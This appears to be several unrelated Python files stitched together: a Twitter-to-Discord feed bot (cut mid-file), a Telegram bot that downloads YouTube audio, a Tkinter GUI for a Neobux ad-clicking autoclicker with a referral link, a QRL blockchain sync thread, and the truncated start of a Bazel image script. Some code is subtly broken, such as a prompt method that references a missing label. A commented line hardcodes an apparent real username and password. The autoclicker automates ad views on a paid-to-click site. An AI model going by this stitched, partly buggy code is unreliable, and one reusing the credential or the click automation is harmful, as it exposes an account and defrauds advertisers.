as seen when done so manually.
"""
datetime_format = datetime.datetime.strptime(raw_date_string, '%a %b %d %H:%M:%S %z %Y').strftime('%Y-%m-%d %H:%M:%S')
tweet_format = datetime.datetime.strptime(datetime_format, '%Y-%m-%d %H:%M:%S')
return tweet_format
def _get_full_text(self):
"""
:return: the full text if found, will be truncated otherwise
Note: a tweet from GET endpoint does not have an
extended_text field. The tweet has to be searched
again using some api.search method.
Opted for api.get_status(id=id, tweet_mode=mode)
"""
tweet_id = int(self._tweet.id)
if hasattr(self._tweet, "text"):
normal_text = self._tweet.text # TODO: Retweets from stream don't have this?
else:
return self._tweet.full_text
search_result = client.api.get_status(id=tweet_id, tweet_mode='extended')
if search_result is None or search_result == "" or search_result == " ":
return normal_text
return search_result.full_text
def _is_retweet(self, tweet):
"""
        :param tweet: the tweet to check; retweets either start with "RT"
        or have their retweeted status set.
        :return: True if the tweet is a retweet, False otherwise
"""
if hasattr(tweet, "retweeted_status"):
return True
# elif tweet.retweeted_status is not None or tweet.retweeted is True:
# return True
return False
def _adjust_fields_for_retweet(self, text):
"""
:param text: the text for adjustments
All other properties are retrieved from self._tweet.
:return: tuple data in the following order:
:returns: text, handle, twitter_url
"""
root_screen_name = self._tweet.author.screen_name # Root user
retweet_screen_name = self._tweet.retweeted_status.user.screen_name # Retweet user
handle = f"retweet from @{retweet_screen_name}"
for index in self._tweet.retweeted_status.entities["urls"]:
if "twitter" in str(index):
text += "\n\n**View full retweet:** __" + index["url"] + "__"
break
if str(text).startswith(f"RT @{root_screen_name}:"):
text = text.replace(f"RT @{root_screen_name}:", "*(Self retweet)*")
else:
text = text.replace("@" + root_screen_name, "**@" + root_screen_name + "**", 1).replace(f"RT @{retweet_screen_name}: ", "", 1)
if "@" + root_screen_name in text:
text = str(text).replace("@" + root_screen_name, "**@" + root_screen_name + "**", 1)
handle = "mention in " + handle
handle = handle[:1].upper() + handle[1:] # Capitalizes first letter while *retaining remaining case*
twitter_url = f"https://www.twitter.com/{retweet_screen_name}"
return text, handle, twitter_url
class TweetQueueWrapper:
def __init__(self):
self.queue = OrderedDict()
self.is_populating = False # So poller will update tweets in order
def push_tweet_id_to_queue(self, tweet_id):
"""
:param tweet_id: note that raw tweet
objects are considered unhashable,
at least for ordered dicts.
        Better to store the ID, as we'll be
repeatedly searching for tweets based
on the ID.
"""
self.queue[tweet_id] = None # Values will be added later
def insert_message_last_item(self, message):
self.queue.update({next(reversed(self.queue)): message})
    def is_empty(self):
        return not self.queue
    def clear_queue(self):
        self.queue.clear()  # Clear in place; dict.clear() returns None, so don't rebind self.queue
def remove_tweet_from_queue(self, tweet_id):
self.queue.pop(tweet_id)
async def push_message_to_tweet_queue(self, message):
        if not message.embeds or (message.channel is not listener.social_media_channel):
            return
if message.embeds[0].author.name != client.profile.name:
return
        while True:
            if queue_wrapper.is_empty():
                await asyncio.sleep(0.01)  # Yield to the event loop until a tweet ID has been queued
                continue
            queue_wrapper.insert_message_last_item(message)
            await asyncio.sleep(0.01)
            print(f"Pushed message to queue...")
            break
class Poll:
def __init__(self):
self.is_polling = False
self._poll_rate = 1 # In seconds
self._num_retries = 5 # If poll error
async def poll_for_data_from_stream(self, client):
"""
        A workaround for an asynchronous function that cannot
        be threaded. This function is called *last* in
        on_ready(). The bot remains operable.
Reasoning: embeds need to be awaited.
Listener pipeline is NOT asynchronous,
which means embed sending can't be
awaited there.
        This (asynchronous) function polls any data
        that was stored from the pipeline every
        _poll_rate seconds.
"""
listener.social_media_channel = utils.get_social_media_feed_channel(client.guild)
listener.commands_channel = utils.get_bot_commands_channel(client.guild)
listener.error = None # Assuming a user does this manually, this needs to clear
print(f"Polling for stream...")
await listener.commands_channel.send(f"Started Twitter feed.")
self.is_polling = True
while True:
try:
await asyncio.sleep(self._poll_rate)
if listener.static_data and listener.dynamic_data:
await embed_and_send(listener.static_data, listener.dynamic_data)
listener.static_data = None
listener.dynamic_data = None
elif listener.error:
await listener.commands_channel.send(f"Twitter poll error: `{listener.error}`\n*Unable to update Twitter feed*. Please retry in __15__ minutes, or refer to the Twitter API response codes for more info.")
self.is_polling = False
break
else:
print(f"No messages in stream listener. Retrying in 5 seconds. Error: {listener.error}")
await asyncio.sleep(5)
except Exception as e:
if self._num_retries == 0:
await listener.commands_channel.send(f"Some unknown exception was caught trying to poll stream. {self._num_retries} retries remaining!\nError: `{e}`")
else:
await listener.commands_channel.send(f"`{self._num_retries}` remaining...")
print(f"Some unknown exception caught trying to poll stream, retrying!:\n\n{e}")
if self._num_retries > 0:
self._num_retries -= 1
continue
else:
self.is_polling = False
listener.error = e
owner = discord.utils.get(client.guild.members, id=int(config['id']['owner']))
await listener.commands_channel.send(f"{owner.mention}, unable to start poller after 5 retries. See `!metrics` for more information")
break
async def poll_for_tweet_updates(self):
print(f"Polling for updates... (Populating: {queue_wrapper.is_populating} | Queue status: {queue_wrapper.queue})")
while True:
await asyncio.sleep(self._poll_rate)
if queue_wrapper.is_populating or queue_wrapper.is_empty():
continue
console_color_green = '\033[92m'
console_color_normal = '\033[0m'
queue_copy = copy.copy(queue_wrapper.queue)
# CRITICAL NOTE: Looping through a dictionary while deleting
# its keys (regardless of where) will permanently block
# the polling process. Loop through a copy instead,
# then delete keys from the original reference.
# (No exceptions are caught either. It's just a
# nuance with async functions)
for tweet_id, msg in queue_copy.items():
if msg is None:
print(F"\t(Waiting for message(s) to be pushed or queued!)")
continue
print(f"\t{console_color_green}Updating next popped tweet | Queue length: {len(queue_wrapper.queue)} | ID: {tweet_id}{console_color_normal} ")
await self._update_tweet(tweet_id, msg)
async def _update_tweet(self, tweet_id, message):
"""
:param tweet_id: IDs were pushed to the
OrderedDict, not the raw tweet objects
:param message: Await message.edit from here
Twitter API gives you 900 show_id and
user_timeline requests.
=======================================
From: api.rate_limit_status()
Location: ['resources']['statuses']
['/statuses/user_timeline'] or ['/statuses/show/:id']
Then: ['limit'] or ['remaining']
LIMITATION: Tweets retrieved in quick succession will have to
wait their turn to be updated. These functions are asynchronous,
not threaded.
"""
counter = 0
update_rate = 1
while counter < 3:
print(f"\tGetting tweet from id {tweet_id}... ({counter}/3)")
await asyncio.sleep(update_rate)
tweet = client.api.get_status(id=tweet_id, tweet_mode='extended')
print(f"\tTweet captured...")
rates_id = client.get_rates_id()
print(f"\tRates captured...")
favorites, retweets = tweet_data_wrapper.get_dynamic_data(tweet)
embed = message.embeds[0]
if embed is None:
print(f"\tEmbed is none!")
embed.set_footer(text=f"💬 0 | 👍 {favorites} | ❤️{favorites} | 🔄 {retweets} • Custom feed developed by Lawrence Chiappelli")
await message.edit(embed=embed)
counter += 1
print(f"\t\tFINISHED UPDATING TWEET!")
del queue_wrapper.queue[tweet_id]
return
async def embed_and_send(static_data, dynamic_data):
"""
:param static_data: tuple of data that never changes
:param dynamic_data: tuple of data that semi-frequently changes
:return: if the designated channel is none, otherwise send embed
Note: replies are part of the premium API.
"""
text, date, handle, followers, following, username, icon_url, thumbnail_url, website_url, twitter_url, img_url = static_data
favorites, retweets = dynamic_data
embed = discord.Embed(title=f"__{handle}__", url=twitter_url, description=f"{following} following | {followers} followers", color=0x8080ff)
embed.set_author(name=username, icon_url=icon_url, url=website_url)
embed.set_thumbnail(url=thumbnail_url)
embed.add_field(name=date, value=text, inline=False)
embed.set_footer(text=f"💬 0 | 👍 {favorites} | ❤️{favorites} | 🔄 {retweets} • Custom feed developed by Lawrence Chiappelli")
if img_url is not None:
embed.set_image(url=img_url)
try:
await listener.social_media_channel.send(embed=embed)
except Exception as e:
warnings.warn(f"Unable to find the social media channel for tweets!:\n{e}")
async def populate_channel_with_tweets(context):
debug_channel = utils.get_bot_commands_channel(context.guild)
num_tweets = 20
queue_wrapper.is_populating = True
while num_tweets != 0:
try:
static_data = tweet_data_wrapper.get_static_data(client.profile, num_tweets-1)
dynamic_data = tweet_data_wrapper.get_dynamic_data()
await embed_and_send(static_data, dynamic_data)
await debug_channel.send(f"✅ Tweet {num_tweets-1} retrieved and sent successfully.")
except Exception as e:
await debug_channel.send(f"❌ Tweet {num_tweets-1} retrieved unsuccessfully:\n<{e}>")
num_tweets -= 1
await asyncio.sleep(1)
queue_wrapper.is_populating = False
async def get_last_tweet():
"""
:return: nothing
For debugging purposes- gets the last tweet of the
currently hardcoded user ID.
"""
static_data = tweet_data_wrapper.get_static_data(client.profile, 0)
dynamic_data = tweet_data_wrapper.get_dynamic_data()
await embed_and_send(static_data, dynamic_data)
twitter_poller = Poll() # Cut+paste to worker if this should automatically start
tweet_data_wrapper = TweetDataRetrieverWrapper()
queue_wrapper = TweetQueueWrapper()
config = configutil.get_parsed_config()
listener = StdOutListener()
profile = TweepyClient().api.get_user(TweepyClient().user_id) # To make a single API call
client = TweepyClient(profile) # Now initialized the client with one profile
thread = threading.Thread(target=listener.thread_stream, args=[])
# TODO: Confirm if the following is needed to retrieve the instances' data
# The motivation for this was due to getting conflicting results with both options
# for server metrics. This may be a symptom of a deeper problem somewhere.
# TODO: If so, it might be better to access the instance directly
# instead of calling a function from the module.
def force_thread_start_for_auth():
"""
:return:
Motivation: in instances
where 420 error occurs, users
can type the necessary command
to connect the stream account.
This may happen during each initial
bot run instance.
Rate limits reset after 15 minutes.
"""
thread.start()
# --------------#
thread.start() # Comment / uncomment during development!! (Or keep in mind rate limits when testing)
# --------------#
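# Startup sketch (illustrative assumption, not part of the original file): per
# the poller docstring above, it is meant to be kicked off from the Discord
# client's on_ready handler, roughly like the following, where `discord_client`
# is a hypothetical connected client with a `guild` attribute:
#
#   @discord_client.event
#   async def on_ready():
#       asyncio.create_task(twitter_poller.poll_for_tweet_updates())
#       await twitter_poller.poll_for_data_from_stream(discord_client)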
|
bot.py
|
import os
import youtube_dl
import telepotpro
from random import randint
from multiprocessing import Process
from youtubesearchpython import VideosSearch
from dotenv import load_dotenv
from os.path import join, dirname
dotenv_path = join(dirname(__file__), '.env')
load_dotenv(dotenv_path)
TOKEN = os.environ.get("TOKEN")
bot = telepotpro.Bot(TOKEN)
class Music:
def __init__(self, user_input, msg):
self.chat = Chat
self.user_input = user_input[6:]
def search_music(self, user_input):
return VideosSearch(user_input, limit = 1).result()
def get_link(self, result):
return result['result'][0]['link']
def get_title(self, result):
return result['result'][0]['title']
def get_duration(self, result):
result = result['result'][0]['duration'].split(':')
min_duration = int(result[0])
split_count = len(result)
return min_duration, split_count
def download_music(self, file_name, link):
ydl_opts = {
'outtmpl': './'+file_name,
'format': 'bestaudio/best',
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '256',
}],
'prefer_ffmpeg': True
}
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
info_dict = ydl.extract_info(link, download=True)
pass
class Chat:
def __init__(self, msg):
self.chat_id = msg['chat']['id']
self.user_input = msg['text']
self.user_input = self.user_input.replace('@TLMusicDownloader_bot', '')
self.user_name = msg['from']['first_name']
self.message_id = msg['message_id']
self.messages = {
'start':'🤖 Hello, '+ self.user_name +'!\n\n'
'📩 Send me:\n\n'
'"*/Song* _song name_" or\n'
'"*/Song* _musician name - song name_"\n\n'
'to order some music. 🎶',
'spotify_input_error':"‼️ *Oops! The bot doesn't support Spotify links!*\n"
'Try: "*/Song* _song name_"\n'
'or: "*/Song* _musician name - song name_"',
'invalid_command':'‼️ *Oops! Invalid command!*\n'
'Try: "*/Song* _song name_"\n'
'or: "*/Song* _musician name - song name_"',
'too_long':'‼️ *Oops! Video too long to convert!*\n'
'Order something 30 minutes or less.'
}
self.check_input(self.user_input, msg)
pass
def send_message(self, content):
return bot.sendMessage(self.chat_id, content, reply_to_message_id=self.message_id, parse_mode='Markdown')
def delete_message(self, message):
chat_id = message['chat']['id']
message_id = message['message_id']
bot.deleteMessage((chat_id, message_id))
pass
def send_audio(self, file_name):
bot.sendAudio(self.chat_id,audio=open(file_name,'rb'), reply_to_message_id=self.message_id)
pass
def process_request(self, user_input):
result = Music.search_music(self, user_input[6:])
min_duration, split_count = Music.get_duration(self, result)
if int(min_duration) < 30 and split_count < 3:
file_name = Music.get_title(self, result) +' - @TLMusicDownloader_bot '+str(randint(0,999999))+'.mp3'
file_name = file_name.replace('"', '')
self.send_message(f"🎵 {Music.get_title(self, result)}\n🔗 {Music.get_link(self, result)}")
downloading_message = self.send_message('⬇️ Downloading... \n_(this may take a while.)_')
Music.download_music(self, file_name, Music.get_link(self, result))
try:
self.send_audio(file_name)
self.delete_message(downloading_message)
                self.send_message('✅ Success!')
                print("\nSuccess!\n")
            except Exception:
                print("\nError")
            os.remove(file_name)
        else:
            # Reject requests longer than 30 minutes, matching the 'too_long' message defined above
            self.send_message(self.messages['too_long'])
        pass
def check_input(self, user_input, msg):
if user_input.startswith('/start'):
self.send_message(self.messages['start'])
elif user_input.startswith('/music') and user_input[6:]!='':
if 'open.spotify.com' in user_input[6:]:
self.send_message(self.messages['spotify_input_error'])
else:
#Valid command
self.process_request(user_input)
else:
#Invalid command
self.send_message(self.messages['invalid_command'])
pass
def start_new_chat(msg):
Process(target=Chat, args=(msg,)).start()
bot.message_loop(start_new_chat, run_forever=True)
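# Example interaction (illustrative, based on the handlers above):
#   /start                        -> bot replies with the welcome/help text
#   /music Daft Punk - Get Lucky  -> bot replies with title + link, downloads the
#                                    audio via youtube_dl and sends back an MP3
#   /music <spotify link>         -> bot replies with the Spotify error message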
|
gui.py
|
from Neobux import Neobux
from Neobux import NeobuxPage
import tkinter
from tkinter import ttk
import multiprocessing
from PIL import Image
from PIL import ImageTk
from PIL.PngImagePlugin import PngImageFile
from urllib.request import Request, urlopen
from base64 import b64decode
from io import BytesIO
import webbrowser
def build_Neobux_driver(connection):
Neobux(None, True, connection).mainloop()
class LabeledEntry(ttk.Frame):
def __init__(self, master = None, label = None, showinput = True, exportselection = 1):
ttk.Frame.__init__(self, master)
self.label = ttk.Label(self, text = label, font = ("Segoe UI", -16))
self.label.grid(row = 0, column = 0)
self.entry = ttk.Entry(self, exportselection = exportselection, font = ("Trebuchet MS", -14, "bold"))
if not showinput:
self.entry["show"] = u"\u2022"
self.entry.grid(row = 0, column = 1)
def get(self):
return self.entry.get()
def disable(self):
self.label.state(["disabled"])
self.entry.state(["disabled"])
def enable(self):
self.label.state(["!disabled"])
self.entry.state(["!disabled"])
class TableFrame(ttk.Frame):
def __init__(self, master = None, **options):
ttk.Frame.__init__(self, master, **options)
def format(self, rows, columns):
self.rows = rows
self.columns = columns
for i in range(self.rows):
self.rowconfigure(i, weight = 1)
for j in range(self.columns):
self.columnconfigure(j, weight = 1)
cellname = "row" + str(i) + "column" + str(j)
setattr(self, cellname, ttk.Frame(self))
cell = getattr(self, cellname)
cell.grid(row = i, column = j, sticky = tkinter.NSEW)
cell.rowconfigure(0, weight = 1)
cell.columnconfigure(0, weight = 1)
def update(self, data):
self.data = data
self._label_table()
self._populate_table()
def _label_table(self):
for i in range(self.rows):
cell = getattr(self, "row" + str(i) + "column0")
cell.label = ttk.Label(cell, text = list(self.data.keys())[i])
cell.label.grid(sticky = tkinter.W)
def _populate_table(self):
for i in range(self.rows):
if self.columns == 2:
cell = getattr(self, "row" + str(i) + "column1")
cell.label = ttk.Label(cell, text = list(self.data.values())[i])
cell.label.grid(sticky = tkinter.E)
else:
for j in range(1, self.columns):
cell = getattr(self, "row" + str(i) + "column" + str(j))
cell.label = ttk.Label(cell, text = list(list(self.data.values())[i].values())[j - 1])
cell.label.grid(sticky = tkinter.E)
class NeobuxLoadingGraphic(tkinter.Canvas):
LOADING_IMAGE_BASE64 = ("iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAACuklEQVRYhcWXoW/iUBzH39+AQC2E"
"VCCqSFOBQqAqUBNViKoKVEUVAlWBqqpAIJ5CVBAEqoJkC4yVDdiNIwOyscDWjG0sd7vMf08svNDb"
"kuMubfdLvmlVP5/3e7/3khKyZzUeGzAWBuSxDMEVwPd4xI/jEFwB+37jv4p6FPJYRqKTQOwohthR"
"DPHjOOLHcfYeCthe21AmCrguh4POAYPuJnYUQ26QC16AehTZ8ywSncSHfCYSKNxaWeB7PLgut5eA"
"NJKCE6AeheAK4LocE0h2kz545iwDZaJAn+swlybMpRmMQOOxgdwgh9RJClyXQ+okhWQ3yZI9z8Ja"
"WeFNfHFaBN/jkTpJ+cJ1OehzPfyjlnbT4Hu8T4Lv8TAWRrhwQghRr1Sk3bRPgu/x4a+ckPfzLvZF"
"pN00BFdgz8Nvh+HDCSHEWBgMLPZFCK4AwRXCHbjdUiYKg4p9EWJfDPZs/63yF3lkzjK+aDMtOoHs"
"eRa7yZxlULmtfJ1AbpBD9a76tQKRDSAhhEgjCblBDtJIYgnsft+n5LHsg0sjCeWbcnQC2kzzwfMX"
"eSgTJToBc2ky8PYpj2VQj0YjYa9t5C/yLPJYhjyWo70L9Lnugxe+F6BMlOiGsf5QZ/BdAWWiRLcV"
"xsJA4XuBwdUrFeqVCm2moXZfC1+i+dSEeqV+KlC6LsFcmmg9t8IVqT/UWeuViQJtpkGf6yhdl1C+"
"KcNcmqAeRfOpifZLG8PXIS5/XWL6NsX0bRqMHPUoitMiW/1WwFgYqNxWYK0sVO+qqD/U0Xxqwtk4"
"OP15iuHrMDgJe22jdF36IGAsDFgrC7X7GuuEs3HQ+dEJVoCQ95mwVpZPYPsfUL2rgnoU9tpG67mF"
"9ks7+C78KbLdAnNpwlpZoB79tAvbmQhUghBCnI0De22DepRtAfUoGo8NOBuHDeW/wn8DCAIBcTEu"
"hj0AAAAASUVORK5CYII=")
def __init__(self, master = None):
tkinter.Canvas.__init__(self, master, height = 32, width = 32, highlightthickness = 0)
self.rotate_loading_graphic = self._update_loading_animation().__next__
self.rotate_loading_graphic()
def _update_loading_animation(self):
loading_image = Image.open(BytesIO(b64decode(NeobuxLoadingGraphic.LOADING_IMAGE_BASE64)))
angle = 0
while True:
self.loading_frame = ImageTk.PhotoImage(loading_image.rotate(angle))
canvas_object = self.create_image(0, 0, image = self.loading_frame, anchor = tkinter.NW)
self.after(58, self.rotate_loading_graphic)
yield
self.delete(canvas_object)
angle -= 15
angle %= 360
class LoginPrompt(ttk.Frame):
def __init__(self, master = None, submit = None):
ttk.Frame.__init__(self, master)
ttk.Style().configure("Error.TLabel", foreground = "red")
self.login_label = ttk.Label(self, text = "Neobux Member Login", font = ("Verdana", -20, "bold"))
self.login_label.grid(row = 0, column = 0)
self.login_status = ttk.Label(self, style = "Error.TLabel")
self.login_status.grid(row = 1, column = 0, pady = (10,5))
self.username_entry = LabeledEntry(self, "Username: ")
self.username_entry.grid(row = 2, column = 0, pady = (0,1), sticky = tkinter.E)
self.password_entry = LabeledEntry(self, "Password: ", False, 0)
self.password_entry.grid(row = 3, column = 0, pady = (0,1), sticky = tkinter.E)
self.secondary_password_entry = LabeledEntry(self, "Secondary Password: ", False, 0)
self.secondary_password_entry.grid(row = 4, column = 0, pady = (0,1), sticky = tkinter.E)
self.login_submit = ttk.Button(self, text = "Submit", command = submit)
self.login_submit.grid(row = 5, column = 0, pady = (10, 5))
def disable(self):
self.login_status["text"] = ""
self.username_entry.disable()
self.password_entry.disable()
self.secondary_password_entry.disable()
def enable(self):
self.username_entry.enable()
self.password_entry.enable()
self.secondary_password_entry.enable()
def set_status(self, status = ""):
self.login_status["text"] = status
def get(self):
username = self.username_entry.get()
password = self.password_entry.get()
secondary_password = self.secondary_password_entry.get()
return username, password, secondary_password
class CaptchaPrompt(ttk.Frame):
def __init__(self, master = None, submit = None):
ttk.Frame.__init__(self, master)
self.captcha_label = ttk.Label(self, text = "Verification", font=("Verdana", -20, "bold"))
self.captcha_label.grid(row = 0, column = 0, columnspan = 2)
self.captcha_description = ttk.Label(self, text = "Enter the letters you see below:\n", justify = tkinter.CENTER)
self.captcha_description.grid(row = 1, column = 0, columnspan = 2, pady = (15, 5))
self.captcha = ImageTk.PhotoImage(file = "example captcha.png")
self.captcha_image = ttk.Label(self, image = self.captcha)
self.captcha_image.grid(row = 2, column = 0, padx = (0, 3))
self.captcha_entry = ttk.Entry(self, font = ("Verdana", -15), width = 9)
self.captcha_entry.grid(row = 2, column = 1)
self.captcha_submit = ttk.Button(self, text = "Submit", command = submit)
self.captcha_submit.grid(row = 3, column = 0, columnspan = 2, pady = (10, 5))
    def set_captcha(self, captcha):
        if isinstance(captcha, ImageTk.PhotoImage):
            self.captcha = captcha
        if isinstance(captcha, PngImageFile):
            self.captcha = ImageTk.PhotoImage(captcha)
        self.captcha_image["image"] = self.captcha  # Refresh the label so the new captcha is displayed
def set_status(self, status):
self.captcha_label["text"] = "Enter the letters you see below:\n" + status
def get(self):
return self.captcha_entry.get()
class AuthenticationPrompt(ttk.Frame):
def __init__(self, master = None, submit = None):
ttk.Frame.__init__(self, master)
self.authentication_label = ttk.Label(self, text = "Two-Factor Authentication", font = ("Verdana", -20, "bold"))
self.authentication_label.grid(row = 0, column = 0)
self.authentication_description = ttk.Label(self, text = "Enter the six digits given by your authenticator app:\n")
self.authentication_description.grid(row = 1, column = 0, pady = (15, 5))
self.authentication_entry = ttk.Entry(self, font = ("Verdana", -16), width = 10)
self.authentication_entry.grid(row = 2, column = 0)
        self.authentication_submit = ttk.Button(self, text = "Submit", command = submit)
self.authentication_submit.grid(row = 3, column = 0, pady = (10, 5))
def set_status(self, status):
self.captcha_label["text"] = "Enter the six digits given by your authenticator app:\n" + status
def get(self):
return self.authentication_entry.get()
class ClickerDashboard(tkinter.Frame):
def __init__(self, master = None):
# Initial Window Setup
tkinter.Frame.__init__(self, master)
icon = ImageTk.PhotoImage(data = b64decode(Neobux.FAVICON_BASE64))
self.master.iconphoto(False, icon)
self.master.title("Neobux Clicker")
# Generate Tab Group
self.tabgroup = ttk.Notebook(self)
self.tabgroup.grid(row = 3, sticky = tkinter.NSEW)
# Banner Initialization
req = Request('https://www.neobux.com/imagens/banner7.gif', headers={'User-Agent': 'Mozilla/5.0'})
self.banner = ImageTk.PhotoImage(data = urlopen(req).read())
self.linked_banner = tkinter.Button(self, bd = 0, highlightthickness = 0,
relief = tkinter.FLAT, image = self.banner, cursor = "hand2",
command = lambda : webbrowser.open_new("https://www.neobux.com/?rh=446A61656E6B"))
self.linked_banner.grid(row = 0, column = 0, columnspan = 2, pady = (0, 5))
# Advertisements Table
self.advertisements = TableFrame(self)
self.tabgroup.add(self.advertisements, text = "Advertisements")
self.advertisements.format(8, 2)
self.advertisements.refresh = ttk.Button(self.advertisements, text = "Refresh")
self.advertisements.refresh.grid(row = 9, column = 0, columnspan = 2)
# Summary Table
self.summary = TableFrame(self)
self.tabgroup.add(self.summary, text = "Account")
self.summary.format(6, 2)
self.summary.refresh = ttk.Button(self.summary, text = "Refresh")
self.summary.refresh.grid(row = 7, column = 0, columnspan = 2)
# Statistics Table
self.statistics = TableFrame(self)
self.tabgroup.add(self.statistics, text = "Statistics")
self.statistics.format(6, 3)
self.statistics.refresh = ttk.Button(self.statistics, text = "Refresh")
self.statistics.refresh.grid(row = 7, column = 0, columnspan = 3)
# Clicker Interface
self.start = ttk.Button(self, text = "Start")
self.interface = ttk.Frame(self)
self.interface.login = ttk.Button(self.interface, text = "Login")
self.interface.login.grid(row = 0, column = 0)
self.interface.start = ttk.Button(self.interface, text = "Start")
self.interface.start.grid(row = 1, column = 0)
self.interface.stop = ttk.Button(self.interface, text = "Stop")
self.interface.stop.grid(row = 2, column = 0)
# self.interface_connection, self.driver_connection = multiprocessing.Pipe()
# self.driver = multiprocessing.Process(target = build_Neobux_driver, args = (self.driver_connection, ))
# self.driver.start()
self.interface.grid(row = 1, column = 0)
self.grid()
def update_advertisements(self, dict):
dict = {
"stale" : 0,
"unique" : 0,
"fixed" : 0,
"micro" : 0,
"mini" : 0,
"standard" : 0,
"extended" : 0,
"adprize" : 0
}
self.advertisements.update(dict)
def update_summary(self, dict):
dict = {
"membership" : "",
"member since" : "",
"seen advertisements" : 0,
"main balance" : 0,
"rental balance" : 0,
"points" : 0
}
self.summary.update(dict)
def update_statistics(self, dict):
dict = {
"unique" : {"Clicks" : 0, "Average" : 0},
"fixed" : {"Clicks" : 0, "Average" : 0},
"micro" : {"Clicks" : 0, "Average" : 0},
"mini" : {"Clicks" : 0, "Average" : 0},
"standard" : {"Clicks" : 0, "Average" : 0},
"extended" : {"Clicks" : 0, "Average" : 0}
}
self.statistics.update(dict)
def disable(self):
self.advertisements.refresh.state(["disabled"])
self.summary.refresh.state(["disabled"])
self.statistics.refresh.state(["disabled"])
def enable(self):
self.advertisements.refresh.state(["!disabled"])
self.summary.refresh.state(["!disabled"])
self.statistics.refresh.state(["!disabled"])
class NeobuxGUI(tkinter.Frame):
"""Tkinter-based GUI for interacting with a Neobux autoclicker"""
def __init__(self, title = "clicker"):
tkinter.Frame.__init__(self)
icon = ImageTk.PhotoImage(data = b64decode(Neobux.FAVICON_BASE64))
self.master.iconphoto(False, icon)
self.master.title(title)
self.config(bg = "white")
self._init_widgets()
self.grid_rowconfigure(0, weight = 1)
self.grid_rowconfigure(2, weight = 1)
self.grid_columnconfigure(0, weight = 1)
self.grid_columnconfigure(2, weight = 1)
# self.interface_connection, self.driver_connection = multiprocessing.Pipe()
# self.driver = multiprocessing.Process(target = build_Neobux_driver, args = (self.driver_connection, ))
# self.driver.start()
self.advertisements.grid(row = 1, column = 1)
self.grid()
def _init_widgets(self):
self.prompt_frame = ttk.Frame(self, width = 400, height = 225)
self.prompt_frame.grid_rowconfigure(0, weight = 1)
self.prompt_frame.grid_rowconfigure(2, weight = 1)
self.prompt_frame.grid_columnconfigure(0, weight = 1)
self.prompt_frame.grid_columnconfigure(2, weight = 1)
self.prompt_frame.grid_propagate(False)
self.loading_animation = NeobuxLoadingGraphic()
self.authentication_prompt = AuthenticationPrompt(self.prompt_frame)
self.captcha_prompt = CaptchaPrompt(self.prompt_frame, self.authentication_prompt.grid)
self.login_prompt = LoginPrompt(self.prompt_frame, self.captcha_prompt.grid)
self.advertisements = ClickerDashboard(self)
def show_prompt(self, prompt):
        for child in self.prompt_frame.winfo_children():
child.grid_forget()
prompt.grid(row = 1, column = 1)
def neobux_login(self):
self.loading_animation.place()
self.login_prompt.disable()
# username, password, secondary_password = self.login_prompt.get_creds()
# self.interface_connection.send(("data", "username", username))
# self.interface_connection.send(("data", "password", password))
# self.interface_connection.send(("data", "secondary_password", secondary_password))
# self.loading_animation.grid(row = 1, column = 0)
# self.interface_connection.send(("data", "page"))
# page = self.interface_connection.recv()
# if page == NeobuxPage.LOGIN:
# self.interface_connection.send(("data", "login_error"))
# self.login_status.config(text = self.interface_connection.recv())
# elif page == NeobuxPage.VERIFICATION:
# self.login_prompt.grid_forget()
# elif page == NeobuxPage.VIEW:
# pass
# else:
# self.interface_connection.send(("method", "view_ads"))
# self.loading_animation.forget()
def destroy(self):
try:
self.interface_connection.send(("method", "exit_loop"))
except:
pass
return super().destroy()
if __name__ == "__main__":
clicker = ClickerDashboard()
clicker.update_advertisements(" ")
clicker.update_statistics(" ")
clicker.update_summary(" ")
clicker.mainloop()
# conn1, conn2 = multiprocessing.Pipe()
# process = multiprocessing.Process(target = build_Neobux_driver, args = (conn2, ))
# process.start()
# conn1.send(("method", "launch", ))
# conn1.send(("data", "username", "Djaenk"))
# conn1.send(("data", "password", "1234!@#$qwerQWER"))
# conn1.send(("data", "username"))
# print(conn1.recv())
# conn1.send(("data", "password"))
# print(conn1.recv())
# conn1.send(("method", "exit_loop"))
|
BlockChainManager.py
|
import threading
from time import sleep
import grpc
from qrl.core import logger
from qrl.generated import qrl_pb2
from qrl.services.PeerManager import PeerManager
class BlockChainManager(object):
def __init__(self, node, peer_manager):
self.node = node
self.peer_manager = peer_manager
self.thread = threading.Thread(target=self._synchronize_chain)
self.thread.daemon = True
self.thread.start()
def _block_received(self, response_future):
if response_future.code() == grpc.StatusCode.OK:
logger.info("[{:20}] _block_received {}".format(response_future.pm.conn_addr, response_future.index))
self._get_blockchain(response_future.pm, response_future.index + 1)
def _get_blockchain(self, peer_metadata, start_index):
req = qrl_pb2.GetBlockReq()
req.index = start_index
f = peer_metadata.stub.GetBlock.future(req, timeout=PeerManager.TIMEOUT_SECS)
f.pm = peer_metadata
f.index = start_index
f.add_done_callback(self._block_received)
def _synchronize_chain(self):
while True:
logger.info("Peers {:4} ({:4})".format(self.peer_manager.stable_peer_count,
self.peer_manager.peer_count))
for peer_metadata in self.peer_manager.stable_peers():
logger.info("{:20}: {:3}".format(peer_metadata.conn_addr,
peer_metadata.node_info.block_height))
for peer_metadata in self.peer_manager.stable_peers():
self._get_blockchain(peer_metadata, 0)
sleep(2)
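# Usage sketch (illustrative, not part of the original file): `node` and
# `peer_manager` are assumed to be an already-initialized qrl node object and
# PeerManager. Constructing the manager is enough to start synchronizing,
# because __init__ spawns the daemon polling thread:
#
#   manager = BlockChainManager(node, peer_manager)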
|
create_images.py
|
#!/usr/bin/env python3
#
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
import itertools
import json
import os
import queue
import subprocess
import sys
import tempfile
import threading
import gcloud
import gcloud_utils
DEBUG = False
PROJECT = "bazel-untrusted"
LOCATION = "europe-north1-a"
IMAGE_CREATION_VMS = {
# Find the newest FreeBSD 11 image via:
# gcloud compute images list --project freebsd-org-cloud-dev \
# --no-standard-images
# ('bk-freebsd11',): {
